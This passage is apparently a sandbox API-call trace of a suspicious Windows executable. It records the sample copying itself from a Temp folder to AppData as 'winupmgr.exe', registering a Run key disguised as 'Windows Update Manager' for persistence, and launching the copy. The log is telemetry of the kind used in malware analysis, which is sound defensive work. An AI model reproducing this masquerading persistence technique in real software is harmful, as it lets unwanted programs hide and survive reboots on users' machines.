lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18ff44, dwMinorVersion=0x77cb1ecd, dwBuildNumber=0x10c3b2, dwPlatformId=0xfffffffe, szCSDVersion="vkÇw'\x0fÔv\x18\x03áv0PT") | out: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0100.827] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f 
[0100.827] GetThreadLocale () returned 0x409 [0100.827] GetThreadLocale () returned 0x409 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jan") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd70, cchData=256 | out: lpLCData="January") returned 8 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Feb") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd70, cchData=256 | out: lpLCData="February") returned 9 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mar") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="March") returned 6 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Apr") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="April") returned 6 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jun") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="June") returned 5 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jul") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="July") returned 5 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Aug") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, 
LCType=0x3f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="August") returned 7 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sep") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd70, cchData=256 | out: lpLCData="September") returned 10 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Oct") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd70, cchData=256 | out: lpLCData="October") returned 8 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Nov") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd70, cchData=256 | out: lpLCData="November") returned 9 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Dec") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd70, cchData=256 | out: lpLCData="December") returned 9 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sun") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mon") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Monday") returned 7 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tue") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wed") returned 4 [0100.832] GetLocaleInfoA (in: 
Locale=0x409, LCType=0x2c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thu") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Fri") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Friday") returned 7 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sat") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.832] GetThreadLocale () returned 0x409 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="$") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec4, cchData=2 | out: lpLCData=".") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="2") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec4, cchData=2 | out: lpLCData="/") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.832] GetThreadLocale () returned 0x409 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | 
out: lpLCData="1") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.832] GetThreadLocale () returned 0x409 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec4, cchData=2 | out: lpLCData=":") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="AM") returned 3 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="PM") returned 3 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0100.833] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0100.833] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0100.833] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0100.834] 
GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0100.836] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x94 [0100.837] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0100.837] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c [0100.837] GetDC (hWnd=0x0) returned 0x4010a8b [0100.837] GetDeviceCaps (hdc=0x4010a8b, index=90) returned 96 [0100.837] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0100.837] GetDC (hWnd=0x0) returned 0x4010a8b [0100.837] GetDeviceCaps (hdc=0x4010a8b, index=104) returned 0 [0100.838] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0100.838] CreatePalette (plpal=0x18fb28) returned 
0x390809e5 [0100.838] GetStockObject (i=7) returned 0x1b00017 [0100.838] GetStockObject (i=5) returned 0x1900015 [0100.838] GetStockObject (i=13) returned 0x18a002e [0100.838] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0100.838] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0100.839] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x2e [0100.839] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x430ba4, nSize=0x2e | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0100.839] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x546b50, ftCreationTime.dwLowDateTime=0x18fedc, ftCreationTime.dwHighDateTime=0x77c7389e, ftLastAccessTime.dwLowDateTime=0x530138, ftLastAccessTime.dwHighDateTime=0x77c7387a, ftLastWriteTime.dwLowDateTime=0x77cef46e, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x530000, nFileSizeLow=0x546b58, dwReserved0=0x5300c4, dwReserved1=0x5374e8, cFileName="ðPT", cAlternateFileName="\x15&@")) returned 0xffffffff [0100.839] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe24, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.839] CopyFileA (lpExistingFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe"), bFailIfExists=1) returned 1 [0100.849] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, 
phkResult=0x18fefc, lpdwDisposition=0x18ff00 | out: phkResult=0x18fefc*=0xa4, lpdwDisposition=0x18ff00*=0x2) returned 0x0 [0100.849] RegSetValueExA (in: hKey=0xa4, lpValueName="Windows Update Manager", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", cbData=0x3b | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned 0x0 [0100.849] RegCloseKey (hKey=0xa4) returned 0x0 [0100.971] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0102.057] ExitProcess (uExitCode=0x0) Thread: id = 60 os_tid = 0x15c Thread: id = 61 os_tid = 0x534 Thread: id = 62 os_tid = 0x7d4 Process: id = "18" image_name = "winupmgr.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe" page_root = "0x421fc000" os_pid = "0x7ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x5f4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 63 os_tid = 0x7c4 [0103.214] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0103.217] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") 
returned 0x76d41282 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalSize") returned 0x76d5d16f [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") 
returned 0x76d41222 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0103.219] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 0x76d4e29e [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0103.220] GetProcAddress 
(hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0103.220] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0103.221] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.221] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0103.221] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0103.222] GetProcAddress (hModule=0x76d30000, 
lpProcName="LocalAlloc") returned 0x76d4168c [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0103.222] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0103.223] 
GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0103.223] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0103.224] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0103.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExA") returned 0x777214b3 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExA") returned 0x77721469 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0103.224] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0103.224] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0103.224] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="UnrealizeObject") returned 0x770bc9ae [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0103.224] GetProcAddress (hModule=0x770a0000, lpProcName="SetROP2") returned 0x770bbc54 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SelectPalette") returned 0x770b5a86 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 
0x770b4f70 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="MoveToEx") returned 0x770b8ee6 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextMetricsA") returned 0x770bd1f1 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetSystemPaletteEntries") returned 0x770bcf02 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetStockObject") returned 0x770b4eb8 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentPositionEx") returned 0x770b908b [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePenIndirect") returned 0x770c1feb [0103.225] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePalette") returned 0x770b795a [0103.226] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontIndirectA") returned 0x770bcffd [0103.226] GetProcAddress (hModule=0x770a0000, lpProcName="CreateBrushIndirect") returned 0x770bb385 [0103.226] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayPtrOfIndex") returned 0x76e5e1ce [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetUBound") returned 0x76e5e127 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetLBound") returned 0x76e5e173 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayCreate") returned 0x76e5e263 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeType") returned 0x76e45dee [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantCopy") returned 0x76e448f1 [0103.226] GetProcAddress (hModule=0x76e40000, lpProcName="VariantClear") returned 0x76e43eae [0103.226] GetProcAddress (hModule=0x76e40000, 
